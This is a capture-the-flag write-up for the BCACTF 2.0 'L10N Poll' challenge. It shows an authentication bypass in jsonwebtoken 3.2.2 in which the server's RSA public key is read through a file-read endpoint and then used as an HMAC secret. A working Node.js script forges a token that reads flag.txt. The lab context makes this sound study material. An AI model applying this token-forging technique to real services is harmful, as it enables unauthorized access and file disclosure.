👨💻
👨💻
👨💻
👨💻
CTFs
HomePentestingLearn
Search…
🚩
Zeyu's CTF Writeups
Home
Pentesting
My Vulnerable Website
My Challenges
SEETF 2022
Cyber League Major 1
STANDCON CTF 2021
2022
BSidesTLV 2022 CTF
Grey Cat The Flag 2022
DEF CON CTF 2022 Qualifiers
Securinets CTF Finals 2022
NahamCon CTF 2022
Securinets CTF Quals 2022
CTF.SG CTF
YaCTF 2022
DiceCTF 2022
TetCTF 2022
2021
hxp CTF 2021
HTX Investigator's Challenge 2021
Metasploit Community CTF
MetaCTF CyberGames
CyberSecurityRumble CTF
The InfoSecurity Challenge (TISC) 2021
SPbCTF's Student CTF Quals
Asian Cyber Security Challenge (ACSC) 2021
CSAW CTF Qualification Round 2021
YauzaCTF 2021
InCTF 2021
UIUCTF 2021
Google CTF 2021
TyphoonCon CTF 2021
DSTA BrainHack CDDC21
BCACTF 2.0
L10N Poll
Challenge Checker
Discrete Mathematics
Advanced Math Analysis
Math Analysis
American Literature
More Than Meets the Eye
􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉
Zh3ro CTF V2
Pwn2Win CTF 2021
NorzhCTF 2021
DawgCTF 2021
UMDCTF 2021
Midnight Sun CTF 2021
picoCTF 2021
DSO-NUS CTF 2021
Powered By GitBook
L10N Poll
jsonwebtoken authentication bypass vulnerability.

Problem

I made the ultimate polling service! Il supporte tout les langues. Это потому, что на сайте используются передовые технологии локализации. ¿Puedes leer esto? أنا متأكد من أنني لا أستطيع. 立即开始!
(The flag is stored in flag.txt.)

Solution

We can see the dependencies in package.json:
1
{
2
"dependencies": {
3
"@koa/router": "^10.0.0",
4
"jsonwebtoken": "^3.2.2",
5
"koa": "^2.13.1",
6
"koa-bodyparser": "^4.3.0",
7
"koa-send": "^5.0.1",
8
"koa-static": "^5.0.0"
9
},
10
"type": "module",
11
"scripts": {
12
"start": "node server.js"
13
}
14
}
Copied!
A quick search tells us that jsonwebtoken 3.2.2 is vulnerable to an authentication bypass vulnerability.
Snyk - [email protected] vulnerabilities | jsonwebtoken 3.2.2
Snyk
Critical vulnerabilities in JSON Web Token libraries
And we can see that in the response for /localization-file, the JWT token is checked and the language is set according to the token value.
1
router.get("/localisation-file", async ctx => {
2
const token = ctx.cookies.get("lion-token");
3
/** @type {string} */
4
let language;
5
if (token) {
6
const payload = await new Promise((resolve, reject) => {
7
try {
8
jwt.verify(token, publicKey, (err, result) => err ? reject(err) : resolve(result));
9
} catch (e) {
10
reject(e);
11
}
12
});
13
language = payload.language;
14
} else {
15
language = languages[Math.floor(Math.random() * languages.length)].id;
16
ctx.cookies.set("lion-token", generateToken(language));
17
}
18
await send(ctx, language, {root: __dirname});
19
});
Copied!
JWT tokens are essentially encoded JSON data. However, normally we cannot tamper the data because there is a signature that is verified at the server-side.
However, in this particular exploit, as long as we are able to get hold of the public key, we can trick the server into thinking that the received public key is actually an HMAC secret key. Since we would know the public key, we would be able to generate a valid private key!
How do we get the key? Well, we know that the key file is in the __dirname directory.
1
const publicKey = readFileSync(join(__dirname, "key"), "utf8");
Copied!
In the POST handler for /localization-language, we are able to control the language parameter to make the server generate a JWT token with the corresponding language in the language field.
1
router.post("/localization-language", async ctx => {
2
const language = ctx.request.body?.language;
3
if (typeof language === "string") {
4
if (language.match(languageRegex)) {
5
ctx.cookies.set("lion-token", generateToken(language));
6
} else {
7
ctx.throw(400, msgs[Math.floor(Math.random() * msgs.length)]);
8
}
9
} else {
10
ctx.throw(400, "no language");
11
}
12
ctx.redirect("/");
13
});
Copied!
Then, in the GET handler for /localisation-file, the server would send us the file at <__dirname>/<language>. Hence, we are able to read arbitrary files.
1
await send(ctx, language, {root: __dirname});
Copied!
However, since we have to pass the following regex:
1
const languageRegex = /^[a-z]+$/;
Copied!
we cannot read flag.txt or key.priv.
Let's test out this theory. I sent a POST request to the /localization-language endpoint, with the JSON data:
1
{
2
"language": "key"
3
}
Copied!
This sets the "language" parameter to "key" in the JWT token.
Then, let's send a GET request to /localisation-file to get the key file.
We can sign the token using the public key, then send it to the server. Although the server expects an RSA public key, because of the vulnerability mentioned earier, it thinks that this is an HMAC private key.
Since the private key was generated from the server's public key, it is definitely valid and the server would accept it.
Here's the script that would generate the JWT payload:
1
import jwt from 'jsonwebtoken';
2
3
var key = `-----BEGIN PUBLIC KEY-----
4
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCRaHtUpvSkcf2KCwXTiX48Tjxf
5
bUVFn7YimqGPQbwTnE0WfR5SxLK/DH0os9jCCeb7pJ08AbHFBzQNUfbg47xI3aJh
6
PMdjL/w3iqfc56C7lt59u4TeOYc7kguph/GTYDPDZkgtbkFJmbkbg9MvV723U1PW
7
M7N2P4b2Xf3p7ZtaewIDAQAB
8
-----END PUBLIC KEY-----`;
9
10
var tokenPayload = {
11
"language": "flag.txt",
12
"iat": 1623595244
13
};
14
15
var forgedToken = jwt.sign(tokenPayload, key);
16
17
console.log(forgedToken);
18
19
try{
20
console.log(jwt.verify(forgedToken, key))
21
} catch (e) {
22
console.log(e);
23
}
Copied!
Note that you'll have to downgrade jsonwebtoken to version 3.2.2 to test whether the exploit works.
The token is successfully verified, which means that our payload worked. We have changed the language parameter to flag.txt.
Plugging in this token value to our lion-token cookie, we can read flag.txt.
2021 - Previous
BCACTF 2.0
Next
Challenge Checker
Last modified 1mo ago
Copy link
Contents
Problem
Solution